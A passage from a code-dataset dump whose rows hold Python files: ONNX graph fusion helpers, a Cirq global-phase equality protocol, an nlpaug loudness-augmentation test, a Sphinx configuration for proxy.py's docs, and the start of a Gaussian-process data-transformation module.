hexsha stringlengths 40 40 | size int64 4 996k | ext stringclasses 8
values | lang stringclasses 1
value | max_stars_repo_path stringlengths 4 245 | max_stars_repo_name stringlengths 6 130 | max_stars_repo_head_hexsha stringlengths 40 40 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 4 245 | max_issues_repo_name stringlengths 6 130 | max_issues_repo_head_hexsha stringlengths 40 40 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 67k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 4 245 | max_forks_repo_name stringlengths 6 130 | max_forks_repo_head_hexsha stringlengths 40 40 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 4 996k | avg_line_length float64 1.33 58.2k | max_line_length int64 2 323k | alphanum_fraction float64 0 0.97 | content_no_comment stringlengths 0 946k | is_comment_constant_removed bool 2
classes | is_sharp_comment_removed bool 1
class |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
7900e39d54b01c16f8a60533eabc3552bdaf547d | 2,421 | py | Python | examples/fastformers/onnx_graph_optimizer/fusion_utils.py | kiminh/fastformers | 8f1aa4f719d7edfa4e77e03d518f7bad2d61004d | [
"Apache-2.0"
] | 1 | 2021-01-11T18:40:10.000Z | 2021-01-11T18:40:10.000Z | examples/fastformers/onnx_graph_optimizer/fusion_utils.py | kiminh/fastformers | 8f1aa4f719d7edfa4e77e03d518f7bad2d61004d | [
"Apache-2.0"
] | null | null | null | examples/fastformers/onnx_graph_optimizer/fusion_utils.py | kiminh/fastformers | 8f1aa4f719d7edfa4e77e03d518f7bad2d61004d | [
"Apache-2.0"
] | null | null | null | #-------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.
#--------------------------------------------------------------------------
from logging import getLogger
from .onnx_model import OnnxModel
from typing import Tuple
from onnx import helper, TensorProto
logger = getLogger(__name__)
class FusionUtils:
def __init__(self, model: OnnxModel):
self.model: OnnxModel = model
def cast_graph_input_to_int32(self, input_name: str) -> Tuple[bool, str]:
graph_input = self.model.find_graph_input(input_name)
if graph_input is not None and graph_input.type.tensor_type.elem_type != TensorProto.INT32:
cast_output, cast_node = self.cast_input_to_int32(input_name)
logger.debug(f"Casted graph input {input_name} to int32")
return True, cast_output
logger.debug(f"Did not cast graph input {input_name} to int32: found {graph_input is not None}")
return False, input_name
def cast_input_to_int32(self, input_name: str):
cast_output = input_name + '_int32'
# Avoid consequent Cast nodes.
inputs = [input_name]
output_name_to_node = self.model.output_name_to_node()
if input_name in output_name_to_node:
parent_node = output_name_to_node[input_name]
if parent_node and parent_node.op_type == 'Cast':
inputs = [parent_node.input[0]]
cast_node = helper.make_node('Cast', inputs=inputs, outputs=[cast_output])
cast_node.attribute.extend([helper.make_attribute("to", int(TensorProto.INT32))])
self.model.add_node(cast_node)
return cast_output, cast_node
def remove_cast_int32(self, input_name: str):
input_name_to_nodes = self.model.input_name_to_nodes()
nodes = input_name_to_nodes[input_name]
for node in nodes:
if node.op_type == "Cast":
is_int32 = False
for att in node.attribute:
if att.name == 'to' and att.i == int(TensorProto.INT32):
is_int32 = True
break
if is_int32:
output_name = node.output[0]
self.model.remove_node(node)
self.model.replace_input_of_all_nodes(output_name, input_name)
| 41.741379 | 104 | 0.609252 |
from logging import getLogger
from .onnx_model import OnnxModel
from typing import Tuple
from onnx import helper, TensorProto
logger = getLogger(__name__)
class FusionUtils:
def __init__(self, model: OnnxModel):
self.model: OnnxModel = model
def cast_graph_input_to_int32(self, input_name: str) -> Tuple[bool, str]:
graph_input = self.model.find_graph_input(input_name)
if graph_input is not None and graph_input.type.tensor_type.elem_type != TensorProto.INT32:
cast_output, cast_node = self.cast_input_to_int32(input_name)
logger.debug(f"Casted graph input {input_name} to int32")
return True, cast_output
logger.debug(f"Did not cast graph input {input_name} to int32: found {graph_input is not None}")
return False, input_name
def cast_input_to_int32(self, input_name: str):
cast_output = input_name + '_int32'
inputs = [input_name]
output_name_to_node = self.model.output_name_to_node()
if input_name in output_name_to_node:
parent_node = output_name_to_node[input_name]
if parent_node and parent_node.op_type == 'Cast':
inputs = [parent_node.input[0]]
cast_node = helper.make_node('Cast', inputs=inputs, outputs=[cast_output])
cast_node.attribute.extend([helper.make_attribute("to", int(TensorProto.INT32))])
self.model.add_node(cast_node)
return cast_output, cast_node
def remove_cast_int32(self, input_name: str):
input_name_to_nodes = self.model.input_name_to_nodes()
nodes = input_name_to_nodes[input_name]
for node in nodes:
if node.op_type == "Cast":
is_int32 = False
for att in node.attribute:
if att.name == 'to' and att.i == int(TensorProto.INT32):
is_int32 = True
break
if is_int32:
output_name = node.output[0]
self.model.remove_node(node)
self.model.replace_input_of_all_nodes(output_name, input_name)
| true | true |
7900e41edb6cc1cb6c455bcc68c0910a3eb7bae2 | 4,101 | py | Python | cirq-core/cirq/protocols/equal_up_to_global_phase_protocol.py | LLcat1217/Cirq | b88069f7b01457e592ad69d6b413642ef11a56b8 | [
"Apache-2.0"
] | 3,326 | 2018-07-18T23:17:21.000Z | 2022-03-29T22:28:24.000Z | cirq-core/cirq/protocols/equal_up_to_global_phase_protocol.py | bradyb/Cirq | 610b0d4ea3a7862169610797266734c844ddcc1f | [
"Apache-2.0"
] | 3,443 | 2018-07-18T21:07:28.000Z | 2022-03-31T20:23:21.000Z | cirq-core/cirq/protocols/equal_up_to_global_phase_protocol.py | bradyb/Cirq | 610b0d4ea3a7862169610797266734c844ddcc1f | [
"Apache-2.0"
] | 865 | 2018-07-18T23:30:24.000Z | 2022-03-30T11:43:23.000Z | # Copyright 2019 The Cirq Developers
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numbers
from collections.abc import Iterable
from typing import Any, Union
import numpy as np
from typing_extensions import Protocol
from cirq import linalg
from cirq._doc import doc_private
from cirq.protocols.approximate_equality_protocol import approx_eq
class SupportsEqualUpToGlobalPhase(Protocol):
"""Object which can be compared for equality mod global phase."""
@doc_private
def _equal_up_to_global_phase_(self, other: Any, *, atol: Union[int, float]) -> bool:
"""Approximate comparator.
Types implementing this protocol define their own logic for comparison
with other types.
Args:
other: Target object for comparison of equality up to global phase.
atol: The minimum absolute tolerance. See `np.isclose()`
documentation for details.
Returns:
True if objects are equal up to a global phase, False otherwise.
Returns NotImplemented when checking equality up to a global phase
is not implemented for given types.
"""
def equal_up_to_global_phase(val: Any, other: Any, *, atol: Union[int, float] = 1e-8) -> bool:
"""Determine whether two objects are equal up to global phase.
If `val` implements a `_equal_up_to_global_phase_` method then it is
invoked and takes precedence over all other checks:
- For complex primitive type the magnitudes of the values are compared.
- For `val` and `other` both iterable of the same length, consecutive
elements are compared recursively. Types of `val` and `other` does not
necessarily needs to match each other. They just need to be iterable and
have the same structure.
- For all other types, fall back to `_approx_eq_`
Args:
val: Source object for approximate comparison.
other: Target object for approximate comparison.
atol: The minimum absolute tolerance. This places an upper bound on
the differences in *magnitudes* of two compared complex numbers.
Returns:
True if objects are approximately equal up to phase, False otherwise.
"""
# Attempt _equal_up_to_global_phase_ for val.
eq_up_to_phase_getter = getattr(val, '_equal_up_to_global_phase_', None)
if eq_up_to_phase_getter is not None:
result = eq_up_to_phase_getter(other, atol)
if result is not NotImplemented:
return result
# Fall back to _equal_up_to_global_phase_ for other.
other_eq_up_to_phase_getter = getattr(other, '_equal_up_to_global_phase_', None)
if other_eq_up_to_phase_getter is not None:
result = other_eq_up_to_phase_getter(val, atol)
if result is not NotImplemented:
return result
# Fall back to special check for numeric arrays.
# Defer to numpy automatic type casting to determine numeric type.
if isinstance(val, Iterable) and isinstance(other, Iterable):
a = np.asarray(val)
b = np.asarray(other)
if a.dtype.kind in 'uifc' and b.dtype.kind in 'uifc':
return linalg.allclose_up_to_global_phase(a, b, atol=atol)
# Fall back to approx_eq for compare the magnitude of two numbers.
if isinstance(val, numbers.Number) and isinstance(other, numbers.Number):
result = approx_eq(abs(val), abs(other), atol=atol) # type: ignore
if result is not NotImplemented:
return result
# Fall back to cirq approx_eq for remaining types.
return approx_eq(val, other, atol=atol)
| 40.60396 | 94 | 0.710802 |
import numbers
from collections.abc import Iterable
from typing import Any, Union
import numpy as np
from typing_extensions import Protocol
from cirq import linalg
from cirq._doc import doc_private
from cirq.protocols.approximate_equality_protocol import approx_eq
class SupportsEqualUpToGlobalPhase(Protocol):
@doc_private
def _equal_up_to_global_phase_(self, other: Any, *, atol: Union[int, float]) -> bool:
def equal_up_to_global_phase(val: Any, other: Any, *, atol: Union[int, float] = 1e-8) -> bool:
eq_up_to_phase_getter = getattr(val, '_equal_up_to_global_phase_', None)
if eq_up_to_phase_getter is not None:
result = eq_up_to_phase_getter(other, atol)
if result is not NotImplemented:
return result
other_eq_up_to_phase_getter = getattr(other, '_equal_up_to_global_phase_', None)
if other_eq_up_to_phase_getter is not None:
result = other_eq_up_to_phase_getter(val, atol)
if result is not NotImplemented:
return result
if isinstance(val, Iterable) and isinstance(other, Iterable):
a = np.asarray(val)
b = np.asarray(other)
if a.dtype.kind in 'uifc' and b.dtype.kind in 'uifc':
return linalg.allclose_up_to_global_phase(a, b, atol=atol)
if isinstance(val, numbers.Number) and isinstance(other, numbers.Number):
result = approx_eq(abs(val), abs(other), atol=atol)
if result is not NotImplemented:
return result
return approx_eq(val, other, atol=atol)
| true | true |
7900e45308c582c70cfe30e4d99db5aad0f8850d | 1,569 | py | Python | test/augmenter/spectrogram/test_loudness_spec.py | lucidworks/nlpaug | 8e47fa39200db17f4dc1d61567af1419bc389071 | [
"MIT"
] | 1 | 2021-06-09T20:07:30.000Z | 2021-06-09T20:07:30.000Z | test/augmenter/spectrogram/test_loudness_spec.py | lucidworks/nlpaug | 8e47fa39200db17f4dc1d61567af1419bc389071 | [
"MIT"
] | null | null | null | test/augmenter/spectrogram/test_loudness_spec.py | lucidworks/nlpaug | 8e47fa39200db17f4dc1d61567af1419bc389071 | [
"MIT"
] | null | null | null | import unittest
import os
import numpy as np
from dotenv import load_dotenv
from nlpaug.util import AudioLoader
import nlpaug.augmenter.spectrogram as nas
class TestLoudnessSpec(unittest.TestCase):
@classmethod
def setUpClass(cls):
env_config_path = os.path.abspath(
os.path.join(os.path.dirname(__file__), "..", "..", "..", ".env")
)
load_dotenv(env_config_path)
# https://freewavesamples.com/yamaha-v50-rock-beat-120-bpm
cls.sample_wav_file = os.path.join(
os.environ.get("TEST_DIR"),
"res",
"audio",
"Yamaha-V50-Rock-Beat-120bpm.wav",
)
def test_no_change_source(self):
data = AudioLoader.load_mel_spectrogram(self.sample_wav_file, n_mels=128)
aug = nas.LoudnessAug(stateless=False)
aug_data = aug.augment(data)
comparison = data == aug_data
self.assertFalse(comparison.all())
def test_substitute(self):
data = AudioLoader.load_mel_spectrogram(self.sample_wav_file, n_mels=128)
aug = nas.LoudnessAug(stateless=False)
aug_data = aug.augment(data)
comparison = (
data[:, aug.time_start : aug.time_end]
== aug_data[:, aug.time_start : aug.time_end]
)
self.assertFalse(comparison.all())
comparison = data[:, : aug.time_start] == aug_data[:, : aug.time_start]
self.assertTrue(comparison.all())
comparison = data[:, aug.time_end :] == aug_data[:, aug.time_end :]
self.assertTrue(comparison.all())
| 33.382979 | 81 | 0.6297 | import unittest
import os
import numpy as np
from dotenv import load_dotenv
from nlpaug.util import AudioLoader
import nlpaug.augmenter.spectrogram as nas
class TestLoudnessSpec(unittest.TestCase):
@classmethod
def setUpClass(cls):
env_config_path = os.path.abspath(
os.path.join(os.path.dirname(__file__), "..", "..", "..", ".env")
)
load_dotenv(env_config_path)
cls.sample_wav_file = os.path.join(
os.environ.get("TEST_DIR"),
"res",
"audio",
"Yamaha-V50-Rock-Beat-120bpm.wav",
)
def test_no_change_source(self):
data = AudioLoader.load_mel_spectrogram(self.sample_wav_file, n_mels=128)
aug = nas.LoudnessAug(stateless=False)
aug_data = aug.augment(data)
comparison = data == aug_data
self.assertFalse(comparison.all())
def test_substitute(self):
data = AudioLoader.load_mel_spectrogram(self.sample_wav_file, n_mels=128)
aug = nas.LoudnessAug(stateless=False)
aug_data = aug.augment(data)
comparison = (
data[:, aug.time_start : aug.time_end]
== aug_data[:, aug.time_start : aug.time_end]
)
self.assertFalse(comparison.all())
comparison = data[:, : aug.time_start] == aug_data[:, : aug.time_start]
self.assertTrue(comparison.all())
comparison = data[:, aug.time_end :] == aug_data[:, aug.time_end :]
self.assertTrue(comparison.all())
| true | true |
7900e48be6a61e1b7b02212b8a36802a97f40208 | 9,861 | py | Python | docs/conf.py | JerryKwan/proxy.py | 57aa628920a34a7c67925911c333c0b744ed0303 | [
"BSD-3-Clause"
] | null | null | null | docs/conf.py | JerryKwan/proxy.py | 57aa628920a34a7c67925911c333c0b744ed0303 | [
"BSD-3-Clause"
] | 9 | 2021-12-10T01:22:33.000Z | 2022-03-31T18:21:07.000Z | docs/conf.py | JerryKwan/proxy.py | 57aa628920a34a7c67925911c333c0b744ed0303 | [
"BSD-3-Clause"
] | null | null | null | # pylint: disable=invalid-name
# Requires Python 3.6+
# Ref: https://www.sphinx-doc.org/en/master/usage/configuration.html
"""Configuration for the Sphinx documentation generator."""
import sys
from functools import partial
from pathlib import Path
from setuptools_scm import get_version
# -- Path setup --------------------------------------------------------------
PROJECT_ROOT_DIR = Path(__file__).parents[1].resolve() # pylint: disable=no-member
get_scm_version = partial(get_version, root=PROJECT_ROOT_DIR)
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.insert(0, str(PROJECT_ROOT_DIR))
# Make in-tree extension importable in non-tox setups/envs, like RTD.
# Refs:
# https://github.com/readthedocs/readthedocs.org/issues/6311
# https://github.com/readthedocs/readthedocs.org/issues/7182
sys.path.insert(0, str((Path(__file__).parent / '_ext').resolve()))
# -- Project information -----------------------------------------------------
github_url = 'https://github.com'
github_repo_org = 'abhinavsingh'
github_repo_name = 'proxy.py'
github_repo_slug = f'{github_repo_org}/{github_repo_name}'
github_repo_url = f'{github_url}/{github_repo_slug}'
github_sponsors_url = f'{github_url}/sponsors'
project = github_repo_name.title()
author = f'{project} project contributors'
copyright = author # pylint: disable=redefined-builtin
# The short X.Y version
version = '.'.join(
get_scm_version(
local_scheme='no-local-version',
).split('.')[:3],
)
# The full version, including alpha/beta/rc tags
release = get_scm_version()
rst_epilog = f"""
.. |project| replace:: {project}
"""
# -- General configuration ---------------------------------------------------
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
# today = ''
# Else, today_fmt is used as the format for a strftime call.
today_fmt = '%B %d, %Y'
# The reST default role (used for this markup: `text`) to use for all
# documents.
# Ref: python-attrs/attrs#571
default_role = 'any'
# If true, '()' will be appended to :func: etc. cross-reference text.
add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
show_authors = True
# The name of the Pygments (syntax highlighting) style to use.
# pygments_style = 'sphinx'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
# stdlib-party extensions:
'sphinx.ext.autodoc',
'sphinx.ext.doctest',
'sphinx.ext.extlinks',
'sphinx.ext.intersphinx',
'sphinx.ext.todo',
'sphinx.ext.coverage',
'sphinx.ext.viewcode',
# Third-party extensions:
'myst_parser', # extended markdown; https://pypi.org/project/myst-parser/
'sphinxcontrib.apidoc',
]
# Conditional third-party extensions:
try:
import sphinxcontrib.spelling as _sphinxcontrib_spelling
except ImportError:
extensions.append('spelling_stub_ext')
else:
del _sphinxcontrib_spelling
extensions.append('sphinxcontrib.spelling')
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = 'en'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This pattern also affects html_static_path and html_extra_path.
exclude_patterns = [
'changelog-fragments.d/**', # Towncrier-managed change notes
]
# -- Options for HTML output -------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'furo'
html_show_sphinx = True
html_theme_options = {
}
html_context = {
}
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
# html_title = f'{project} Documentation'
# A shorter title for the navigation bar. Default is the same as html_title.
# html_short_title = 'Documentation'
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
html_last_updated_fmt = '%b %d, %Y'
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
# html_use_opensearch = f'https://{github_repo_name.replace(".", "")}.readthedocs.io/en/latest/'
# The master toctree document.
root_doc = master_doc = 'index' # Sphinx 4+ / 3- # noqa: WPS429
# -- Extension configuration -------------------------------------------------
# -- Options for intersphinx extension ---------------------------------------
intersphinx_mapping = {
'myst': ('https://myst-parser.rtfd.io/en/latest', None),
'python': ('https://docs.python.org/3', None),
'python2': ('https://docs.python.org/2', None),
}
# -- Options for todo extension ----------------------------------------------
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = True
# -- Options for sphinxcontrib.apidoc extension ------------------------------
apidoc_excluded_paths = [
'plugin/cache/*',
'testing/*.py',
]
apidoc_extra_args = [
'--implicit-namespaces',
'--private', # include “_private” modules
]
apidoc_module_dir = str(PROJECT_ROOT_DIR / 'proxy')
apidoc_module_first = False
apidoc_output_dir = 'pkg'
apidoc_separate_modules = True
apidoc_toc_file = None
# -- Options for sphinxcontrib.spelling extension ----------------------------
spelling_ignore_acronyms = True
spelling_ignore_importable_modules = True
spelling_ignore_pypi_package_names = True
spelling_ignore_python_builtins = True
spelling_ignore_wiki_words = True
spelling_show_suggestions = True
spelling_word_list_filename = [
'spelling_wordlist.txt',
]
# -- Options for extlinks extension ------------------------------------------
extlinks = {
'issue': (f'{github_repo_url}/issues/%s', '#'), # noqa: WPS323
'pr': (f'{github_repo_url}/pull/%s', 'PR #'), # noqa: WPS323
'commit': (f'{github_repo_url}/commit/%s', ''), # noqa: WPS323
'gh': (f'{github_url}/%s', 'GitHub: '), # noqa: WPS323
'user': (f'{github_sponsors_url}/%s', '@'), # noqa: WPS323
}
# -- Options for linkcheck builder -------------------------------------------
linkcheck_ignore = [
r'http://localhost:\d+/', # local URLs
]
linkcheck_workers = 25
# -- Options for myst_parser extension ------------------------------------------
myst_enable_extensions = [
'colon_fence', # allow to optionally use ::: instead of ```
'deflist',
'html_admonition', # allow having HTML admonitions
'html_image', # allow HTML <img> in Markdown
# FIXME: `linkify` turns "Proxy.Py` into a link so it's disabled now
# Ref: https://github.com/executablebooks/MyST-Parser/issues/428#issuecomment-970277208
# "linkify", # auto-detect URLs @ plain text, needs myst-parser[linkify]
'replacements', # allows Jinja2-style replacements
'smartquotes', # use "cursive" quotes
'substitution', # replace common ASCII shortcuts into their symbols
]
myst_substitutions = {
'project': project,
}
# -- Strict mode -------------------------------------------------------------
# The reST default role (used for this markup: `text`) to use for all
# documents.
# Ref: python-attrs/attrs#571
default_role = 'any'
nitpicky = True
_any_role = 'any'
_py_obj_role = 'py:obj'
_py_class_role = 'py:class'
nitpick_ignore = [
(_any_role, '<proxy.HttpProxyBasePlugin>'),
(_any_role, '__init__'),
(_any_role, 'Client'),
(_any_role, 'event_queue'),
(_any_role, 'fd_queue'),
(_any_role, 'flag.flags'),
(_any_role, 'flags.work_klass'),
(_any_role, 'flush'),
(_any_role, 'httpx'),
(_any_role, 'HttpParser.state'),
(_any_role, 'HttpProtocolHandler'),
(_any_role, 'multiprocessing.Manager'),
(_any_role, 'proxy.core.base.tcp_upstream.TcpUpstreamConnectionHandler'),
(_any_role, 'work_klass'),
(_py_class_role, '_asyncio.Task'),
(_py_class_role, 'asyncio.events.AbstractEventLoop'),
(_py_class_role, 'CacheStore'),
(_py_class_role, 'HttpParser'),
(_py_class_role, 'HttpProtocolHandlerPlugin'),
(_py_class_role, 'HttpProxyBasePlugin'),
(_py_class_role, 'HttpWebServerBasePlugin'),
(_py_class_role, 'multiprocessing.context.Process'),
(_py_class_role, 'multiprocessing.synchronize.Lock'),
(_py_class_role, 'NonBlockingQueue'),
(_py_class_role, 'paramiko.channel.Channel'),
(_py_class_role, 'proxy.http.parser.parser.T'),
(_py_class_role, 'proxy.plugin.cache.store.base.CacheStore'),
(_py_class_role, 'proxy.core.pool.AcceptorPool'),
(_py_class_role, 'proxy.core.executors.ThreadlessPool'),
(_py_class_role, 'proxy.core.acceptor.threadless.T'),
(_py_class_role, 'queue.Queue[Any]'),
(_py_class_role, 'TcpClientConnection'),
(_py_class_role, 'TcpServerConnection'),
(_py_class_role, 'unittest.case.TestCase'),
(_py_class_role, 'unittest.result.TestResult'),
(_py_class_role, 'UUID'),
(_py_class_role, 'Url'),
(_py_class_role, 'WebsocketFrame'),
(_py_class_role, 'Work'),
(_py_obj_role, 'proxy.core.acceptor.threadless.T'),
]
| 33.427119 | 96 | 0.673461 |
import sys
from functools import partial
from pathlib import Path
from setuptools_scm import get_version
PROJECT_ROOT_DIR = Path(__file__).parents[1].resolve()
get_scm_version = partial(get_version, root=PROJECT_ROOT_DIR)
sys.path.insert(0, str(PROJECT_ROOT_DIR))
sys.path.insert(0, str((Path(__file__).parent / '_ext').resolve()))
github_url = 'https://github.com'
github_repo_org = 'abhinavsingh'
github_repo_name = 'proxy.py'
github_repo_slug = f'{github_repo_org}/{github_repo_name}'
github_repo_url = f'{github_url}/{github_repo_slug}'
github_sponsors_url = f'{github_url}/sponsors'
project = github_repo_name.title()
author = f'{project} project contributors'
copyright = author
version = '.'.join(
get_scm_version(
local_scheme='no-local-version',
).split('.')[:3],
)
release = get_scm_version()
rst_epilog = f"""
.. |project| replace:: {project}
"""
today_fmt = '%B %d, %Y'
ault_role = 'any'
add_function_parentheses = True
add_module_names = True
show_authors = True
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.doctest',
'sphinx.ext.extlinks',
'sphinx.ext.intersphinx',
'sphinx.ext.todo',
'sphinx.ext.coverage',
'sphinx.ext.viewcode',
'myst_parser',
'sphinxcontrib.apidoc',
]
try:
import sphinxcontrib.spelling as _sphinxcontrib_spelling
except ImportError:
extensions.append('spelling_stub_ext')
else:
del _sphinxcontrib_spelling
extensions.append('sphinxcontrib.spelling')
language = 'en'
exclude_patterns = [
'changelog-fragments.d/**',
]
html_theme = 'furo'
html_show_sphinx = True
html_theme_options = {
}
html_context = {
}
html_last_updated_fmt = '%b %d, %Y'
root_doc = master_doc = 'index' hinx_mapping = {
'myst': ('https://myst-parser.rtfd.io/en/latest', None),
'python': ('https://docs.python.org/3', None),
'python2': ('https://docs.python.org/2', None),
}
todo_include_todos = True
apidoc_excluded_paths = [
'plugin/cache/*',
'testing/*.py',
]
apidoc_extra_args = [
'--implicit-namespaces',
'--private',
]
apidoc_module_dir = str(PROJECT_ROOT_DIR / 'proxy')
apidoc_module_first = False
apidoc_output_dir = 'pkg'
apidoc_separate_modules = True
apidoc_toc_file = None
spelling_ignore_acronyms = True
spelling_ignore_importable_modules = True
spelling_ignore_pypi_package_names = True
spelling_ignore_python_builtins = True
spelling_ignore_wiki_words = True
spelling_show_suggestions = True
spelling_word_list_filename = [
'spelling_wordlist.txt',
]
extlinks = {
'issue': (f'{github_repo_url}/issues/%s', '#'),
'pr': (f'{github_repo_url}/pull/%s', 'PR #'),
'commit': (f'{github_repo_url}/commit/%s', ''),
'gh': (f'{github_url}/%s', 'GitHub: '),
'user': (f'{github_sponsors_url}/%s', '@'),
}
linkcheck_ignore = [
r'http://localhost:\d+/',
]
linkcheck_workers = 25
myst_enable_extensions = [
'colon_fence',
'deflist',
'html_admonition',
'html_image',
# Ref: https://github.com/executablebooks/MyST-Parser/issues/428#issuecomment-970277208
# "linkify", # auto-detect URLs @ plain text, needs myst-parser[linkify]
'replacements', # allows Jinja2-style replacements
'smartquotes', # use "cursive" quotes
'substitution', # replace common ASCII shortcuts into their symbols
]
myst_substitutions = {
'project': project,
}
# -- Strict mode -------------------------------------------------------------
# The reST default role (used for this markup: `text`) to use for all
# documents.
# Ref: python-attrs/attrs#571
default_role = 'any'
nitpicky = True
_any_role = 'any'
_py_obj_role = 'py:obj'
_py_class_role = 'py:class'
nitpick_ignore = [
(_any_role, '<proxy.HttpProxyBasePlugin>'),
(_any_role, '__init__'),
(_any_role, 'Client'),
(_any_role, 'event_queue'),
(_any_role, 'fd_queue'),
(_any_role, 'flag.flags'),
(_any_role, 'flags.work_klass'),
(_any_role, 'flush'),
(_any_role, 'httpx'),
(_any_role, 'HttpParser.state'),
(_any_role, 'HttpProtocolHandler'),
(_any_role, 'multiprocessing.Manager'),
(_any_role, 'proxy.core.base.tcp_upstream.TcpUpstreamConnectionHandler'),
(_any_role, 'work_klass'),
(_py_class_role, '_asyncio.Task'),
(_py_class_role, 'asyncio.events.AbstractEventLoop'),
(_py_class_role, 'CacheStore'),
(_py_class_role, 'HttpParser'),
(_py_class_role, 'HttpProtocolHandlerPlugin'),
(_py_class_role, 'HttpProxyBasePlugin'),
(_py_class_role, 'HttpWebServerBasePlugin'),
(_py_class_role, 'multiprocessing.context.Process'),
(_py_class_role, 'multiprocessing.synchronize.Lock'),
(_py_class_role, 'NonBlockingQueue'),
(_py_class_role, 'paramiko.channel.Channel'),
(_py_class_role, 'proxy.http.parser.parser.T'),
(_py_class_role, 'proxy.plugin.cache.store.base.CacheStore'),
(_py_class_role, 'proxy.core.pool.AcceptorPool'),
(_py_class_role, 'proxy.core.executors.ThreadlessPool'),
(_py_class_role, 'proxy.core.acceptor.threadless.T'),
(_py_class_role, 'queue.Queue[Any]'),
(_py_class_role, 'TcpClientConnection'),
(_py_class_role, 'TcpServerConnection'),
(_py_class_role, 'unittest.case.TestCase'),
(_py_class_role, 'unittest.result.TestResult'),
(_py_class_role, 'UUID'),
(_py_class_role, 'Url'),
(_py_class_role, 'WebsocketFrame'),
(_py_class_role, 'Work'),
(_py_obj_role, 'proxy.core.acceptor.threadless.T'),
]
| true | true |
7900e4fba482c2349f7afd1bedc8ed327d0b15f8 | 4,326 | py | Python | GP/data_transformation.py | VirgiAgl/V_savigp | 310f31f789db34737313bf057ff1474e314d68fd | [
"Apache-2.0"
] | 7 | 2016-04-25T15:02:34.000Z | 2020-03-30T15:10:03.000Z | GP/data_transformation.py | VirgiAgl/V_savigp | 310f31f789db34737313bf057ff1474e314d68fd | [
"Apache-2.0"
] | null | null | null | GP/data_transformation.py | VirgiAgl/V_savigp | 310f31f789db34737313bf057ff1474e314d68fd | [
"Apache-2.0"
] | 5 | 2015-12-09T22:57:58.000Z | 2020-10-07T11:01:34.000Z | import numpy as np
from sklearn import preprocessing
class DataTransformation:
"""
A generic class for the transformation of data
"""
def __init__(self):
pass
def transform_X(self, X):
"""
transforms X
:param
X: Input X
:return
transformed X
"""
raise NotImplementedError()
def transform_Y(self, Y):
"""
transforms Y
:param
Y: Input Y
:return
transformed Y
"""
raise NotImplementedError()
def untransform_X(self, X):
"""
Untransforms X to its original values
:param
X: transformed X
:return
untransformed X
"""
raise NotImplementedError()
def untransform_Y(self, Y):
"""
Untransforms Y
:param
Y: transformed Y
:return
untransfomred Y
"""
raise NotImplementedError()
def untransform_Y_var(self, Yvar):
raise NotImplementedError()
def untransform_NLPD(self, NLPD):
"""
Untransfomrs NLPD to the original Y space
:param
NLPD: transfomred NLPD
:return
untransformed NLPD
"""
raise NotImplementedError()
class IdentityTransformation:
"""
Identity transformation. No transformation will be applied to data.
"""
def __init__(self):
pass
def transform_X(self, X):
return X
def transform_Y(self, Y):
return Y
def untransform_X(self, X):
return X
def untransform_Y(self, Y):
return Y
def untransform_Y_var(self, Yvar):
return Yvar
@staticmethod
def get_transformation(Y, X):
return IdentityTransformation()
def untransform_NLPD(self, NLPD):
return NLPD
# FIX: bases were (object, DataTransformation), which Python 3 rejects with
# "TypeError: Cannot create a consistent method resolution order" because
# `object` must come after any class that derives from it. Listing `object`
# last keeps Python-2 new-style semantics while giving a valid Python-3 MRO.
class MeanTransformation(DataTransformation, object):
    """
    Centers the targets only:
        transformed Y = Y - mean(Y)
    X is left untouched.
    """
    def __init__(self, mean):
        super(MeanTransformation, self).__init__()
        # Per-output mean subtracted from (and added back to) Y.
        self.mean = mean
    def transform_X(self, X):
        return X
    def transform_Y(self, Y):
        return Y - self.mean
    def untransform_X(self, X):
        return X
    def untransform_Y(self, Y):
        return Y + self.mean
    def untransform_Y_var(self, Yvar):
        # A constant shift does not change the variance.
        return Yvar
    def untransform_NLPD(self, NLPD):
        # A pure shift has unit Jacobian, so the density is unchanged.
        return NLPD
    @staticmethod
    def get_transformation(Y, X):
        return MeanTransformation(Y.mean(axis=0))
# FIX: bases were (object, DataTransformation) — an inconsistent MRO under
# Python 3 (object must come last). Listing `object` last keeps Python-2
